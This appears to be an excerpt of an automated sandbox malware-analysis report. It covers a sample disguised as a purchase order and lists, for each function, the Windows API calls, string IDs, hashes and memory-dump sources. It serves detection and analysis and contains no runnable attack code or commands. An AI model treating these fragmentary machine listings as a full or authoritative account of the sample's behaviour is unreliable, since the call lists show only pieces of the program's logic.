                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                            • String ID:
                                                            • API String ID: 3969911579-0
                                                            • Opcode ID: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                            • Instruction ID: 40287395d2d29e4935595b2baf4d6657c54b4003bec4d35786bf86d2452689d1
                                                            • Opcode Fuzzy Hash: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                            • Instruction Fuzzy Hash: 41414C75600208AFDB10DF64DD88FAE77B8EF48711F108659FA05AB290D7B5AD01CB68
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow
                                                            • String ID: 0
                                                            • API String ID: 956284711-4108050209
                                                            • Opcode ID: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                            • Instruction ID: b5af5d15e8ca477bb279da78e69062a53aed449fe0dbaae2e4c2ef00f9b57ed5
                                                            • Opcode Fuzzy Hash: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                            • Instruction Fuzzy Hash: 91412770200601AFD714DF64D9A8B6B77A8BF48302F10896DFD45CB292D778E848CFA9
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: _wcscpy$Cleanup$Startup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                            • String ID: 0.0.0.0
                                                            • API String ID: 1965227024-3771769585
                                                            • Opcode ID: 3769f90e7891a7f45cae943bdf4bb8482844758e4de513001ef727f9f6023d4a
                                                            • Instruction ID: 28916de6e65f37ac85efecafd260a3a31c9a3caf28ae6c56f7260ddb0d4b80cb
                                                            • Opcode Fuzzy Hash: 3769f90e7891a7f45cae943bdf4bb8482844758e4de513001ef727f9f6023d4a
                                                            • Instruction Fuzzy Hash: 4F213A32A00114BBC710AF65DC05EEF736CEF99716F0045AFF90993151EEB99A8187E8
                                                            APIs
                                                              • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                              • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                            • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045F5D5
                                                            • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F5EC
                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045F5FE
                                                            • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045F611
                                                            • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F61E
                                                            • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0045F634
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: SendString$_memmove_wcslen
                                                            • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                            • API String ID: 369157077-1007645807
                                                            • Opcode ID: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                            • Instruction ID: e81aaa69409cfefceaf3864659f825962b2ddf67c6d06b6a861a29a56a66176d
                                                            • Opcode Fuzzy Hash: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                            • Instruction Fuzzy Hash: 7F21A83168021D66E720FB95DC46FFE7368AF40700F20087BFA14B71D1DAB4A949879D
                                                            APIs
                                                            • GetParent.USER32 ref: 00445BF8
                                                            • GetClassNameW.USER32(00000000,?,00000100), ref: 00445C0D
                                                            • __wcsicoll.LIBCMT ref: 00445C33
                                                            • __wcsicoll.LIBCMT ref: 00445C4F
                                                            • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445CA9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: __wcsicoll$ClassMessageNameParentSend
                                                            • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                            • API String ID: 3125838495-3381328864
                                                            • Opcode ID: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                            • Instruction ID: b9a51c7f116d0e73852bd225d20f6d8bcb5f39b8f57bd3164038c04ed7d94027
                                                            • Opcode Fuzzy Hash: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                            • Instruction Fuzzy Hash: C6110AB1E447017BFE10BA659D46EBB339C9B54B11F00051BFE44D7242F6ACA94147A9
                                                            APIs
                                                            • SendMessageW.USER32(?,?,000000FF,?), ref: 004492A4
                                                            • SendMessageW.USER32(?,?,00000000,00000000), ref: 004492B7
                                                            • CharNextW.USER32(?,?,?,000000FF,?), ref: 004492E9
                                                            • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449301
                                                            • SendMessageW.USER32(?,?,00000000,?), ref: 00449332
                                                            • SendMessageW.USER32(?,?,000000FF,?), ref: 00449349
                                                            • SendMessageW.USER32(?,?,00000000,00000000), ref: 0044935C
                                                            • SendMessageW.USER32(?,00000402,?), ref: 00449399
                                                            • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044940D
                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$CharNext
                                                            • String ID:
                                                            • API String ID: 1350042424-0
                                                            • Opcode ID: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                            • Instruction ID: 867fdc7b80e212b75fe5daf06e5219747a853435bb2a874e280223eddbea68d3
                                                            • Opcode Fuzzy Hash: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                            • Instruction Fuzzy Hash: 5B81D535A00119BBEB10CF85DD80FFFB778FB55720F10825AFA14AA280D7B99D4197A4
                                                            APIs
                                                              • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                              • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                            • GetDriveTypeW.KERNEL32(?), ref: 004787B9
                                                            • _wcscpy.LIBCMT ref: 004787E5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                                                            • String ID: \VH$a$all$cdrom$fixed$network$ramdisk$removable$unknown
                                                            • API String ID: 3052893215-2127371420
                                                            • Opcode ID: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                            • Instruction ID: 541bc2b2506c052d744bcb7e7e177e26c036821b53f5a58429f0f0853ea8de24
                                                            • Opcode Fuzzy Hash: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                            • Instruction Fuzzy Hash: 4761C1716443018BD700EF14CC85B9BB7D4AB84348F14892FF949AB382DB79E94987AB
                                                            APIs
                                                            • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E77F
                                                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                            • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E7A0
                                                            • __swprintf.LIBCMT ref: 0045E7F7
                                                            • _wprintf.LIBCMT ref: 0045E8B3
                                                            • _wprintf.LIBCMT ref: 0045E8D7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                            • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                            • API String ID: 2295938435-2354261254
                                                            • Opcode ID: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                            • Instruction ID: 453f5dd12ee62c270a242db3517b58e8b6225e49c0ff470bc5072f32437c925c
                                                            • Opcode Fuzzy Hash: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                            • Instruction Fuzzy Hash: 6A519E71A10219ABDB14EB91CC85EEF7778AF44314F14407EF90477292DB78AE49CBA8
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: __swprintf_wcscpy$__i64tow__itow
                                                            • String ID: %.15g$0x%p$False$True
                                                            • API String ID: 3038501623-2263619337
                                                            • Opcode ID: 42e64448fb0921aa5bc042f3a22c06f2a5717f1c2cd6c32af37c77127d07761a
                                                            • Instruction ID: fd507a47f7d2c8f7f5848ea17d112ce969af4838d766d220e6d3988dad71e25c
                                                            • Opcode Fuzzy Hash: 42e64448fb0921aa5bc042f3a22c06f2a5717f1c2cd6c32af37c77127d07761a
                                                            • Instruction Fuzzy Hash: 264108729001005BDB10EF75DC42FAAB364EF55306F0445ABFE09CB242EA39DA48C79A
                                                            APIs
                                                            • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E580
                                                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                            • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E59F
                                                            • __swprintf.LIBCMT ref: 0045E5F6
                                                            • _wprintf.LIBCMT ref: 0045E6A3
                                                            • _wprintf.LIBCMT ref: 0045E6C7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                            • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                            • API String ID: 2295938435-8599901
                                                            • Opcode ID: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                            • Instruction ID: ff3e2b23dced8a629e5b21f12e79e468b5cd48208a3d74017576322ff0354a8f
                                                            • Opcode Fuzzy Hash: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                            • Instruction Fuzzy Hash: 9A519171D00109ABDB14EBA1C845EEF7778EF44304F50847EF91477292EA78AE49CBA8
                                                            APIs
                                                            • timeGetTime.WINMM ref: 00443B67
                                                              • Part of subcall function 0040C620: timeGetTime.WINMM(0042DD5D), ref: 0040C620
                                                            • Sleep.KERNEL32(0000000A), ref: 00443B9F
                                                            • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00443BC8
                                                            • SetActiveWindow.USER32(00000000), ref: 00443BEC
                                                            • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC
                                                            • SendMessageW.USER32(00000000,00000010,00000000,00000000), ref: 00443C22
                                                            • Sleep.KERNEL32(000000FA), ref: 00443C2D
                                                            • IsWindow.USER32(00000000), ref: 00443C3A
                                                            • EndDialog.USER32(00000000,00000000), ref: 00443C4C
                                                              • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                              • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                              • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                            • EnumThreadWindows.USER32(00000000,Function_00033D09,00000000), ref: 00443C6B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: ThreadWindow$MessageSendSleepTimetime$ActiveAttachCurrentDialogEnumFindInputProcessWindows
                                                            • String ID: BUTTON
                                                            • API String ID: 1834419854-3405671355
                                                            • Opcode ID: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                            • Instruction ID: 3c6370bb7d17ad47abda0b7088cfd3672c19e1ca6c3f529de1b12449ce3ad6f8
                                                            • Opcode Fuzzy Hash: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                            • Instruction Fuzzy Hash: 6B31E676784200BFE3349F74FD99F5A3B58AB55B22F10083AF600EA2A1D6B5A441876C
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,?,0042820D,?,?,?,#include depth exceeded. Make sure there are no recursive includes,?), ref: 00454039
                                                            • LoadStringW.USER32(00000000), ref: 00454040
                                                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                            • _wprintf.LIBCMT ref: 00454074
                                                            • __swprintf.LIBCMT ref: 004540A3
                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0045410F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: HandleLoadMessageModuleString__swprintf_memmove_wcslen_wprintf
                                                            • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                            • API String ID: 455036304-4153970271
                                                            • Opcode ID: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                            • Instruction ID: e2f14448b15a7dab571624068eda089460c560eca1c8ebe4dd0daaccfe0aa2c5
                                                            • Opcode Fuzzy Hash: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                            • Instruction Fuzzy Hash: 3B31E872B0011997CB00EF95CD069AE3378AF88714F50445EFA0877282D678AE45C7A9
                                                            APIs
                                                            • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467D63
                                                            • SafeArrayAccessData.OLEAUT32(0000007F,0000007F), ref: 00467DDC
                                                            • SafeArrayGetVartype.OLEAUT32(0000007F,?), ref: 00467E71
                                                            • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00467E9D
                                                            • _memmove.LIBCMT ref: 00467EB8
                                                            • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00467EC1
                                                            • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467EDE
                                                            • _memmove.LIBCMT ref: 00467F6C
                                                            • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467FC1
                                                            • SafeArrayUnaccessData.OLEAUT32(00000004), ref: 00467FAB
                                                              • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                              • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                              • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                            • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00467E48
                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                            • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00468030
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: ArraySafe$Data$Access$Unaccess$_memmovestd::exception::exception$Exception@8ThrowVartype_malloc
                                                            • String ID:
                                                            • API String ID: 2170234536-0
                                                            • Opcode ID: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                                                            • Instruction ID: 6369f5c3f22445f0d5bf5c4520e4337682cbd46778e63a39b460943b9460954a
                                                            • Opcode Fuzzy Hash: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                                                            • Instruction Fuzzy Hash: 26B124716042059FD700CF59D884BAEB7B5FF88308F24856EEA05DB351EB3AD845CB6A
                                                            APIs
                                                            • GetKeyboardState.USER32(?), ref: 00453CE0
                                                            • SetKeyboardState.USER32(?), ref: 00453D3B
                                                            • GetAsyncKeyState.USER32(000000A0), ref: 00453D5E
                                                            • GetKeyState.USER32(000000A0), ref: 00453D75
                                                            • GetAsyncKeyState.USER32(000000A1), ref: 00453DA4
                                                            • GetKeyState.USER32(000000A1), ref: 00453DB5
                                                            • GetAsyncKeyState.USER32(00000011), ref: 00453DE1
                                                            • GetKeyState.USER32(00000011), ref: 00453DEF
                                                            • GetAsyncKeyState.USER32(00000012), ref: 00453E18
                                                            • GetKeyState.USER32(00000012), ref: 00453E26
                                                            • GetAsyncKeyState.USER32(0000005B), ref: 00453E4F
                                                            • GetKeyState.USER32(0000005B), ref: 00453E5D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: State$Async$Keyboard
                                                            • String ID:
                                                            • API String ID: 541375521-0
                                                            • Opcode ID: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                            • Instruction ID: 009fbf1908f75ed0a62addf5985db529f64a747a45b1090b1102dc3b9208550d
                                                            • Opcode Fuzzy Hash: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                            • Instruction Fuzzy Hash: BC61DD3190478829FB329F6488057EBBBF45F12346F08459ED9C2162C3D7AC6B4CCB65
                                                            APIs
                                                            • GetDlgItem.USER32(?,00000001), ref: 004357DB
                                                            • GetWindowRect.USER32(00000000,?), ref: 004357ED
                                                            • MoveWindow.USER32(?,0000000A,?,?,?,00000000), ref: 00435857
                                                            • GetDlgItem.USER32(?,00000002), ref: 0043586A
                                                            • GetWindowRect.USER32(00000000,?), ref: 0043587C
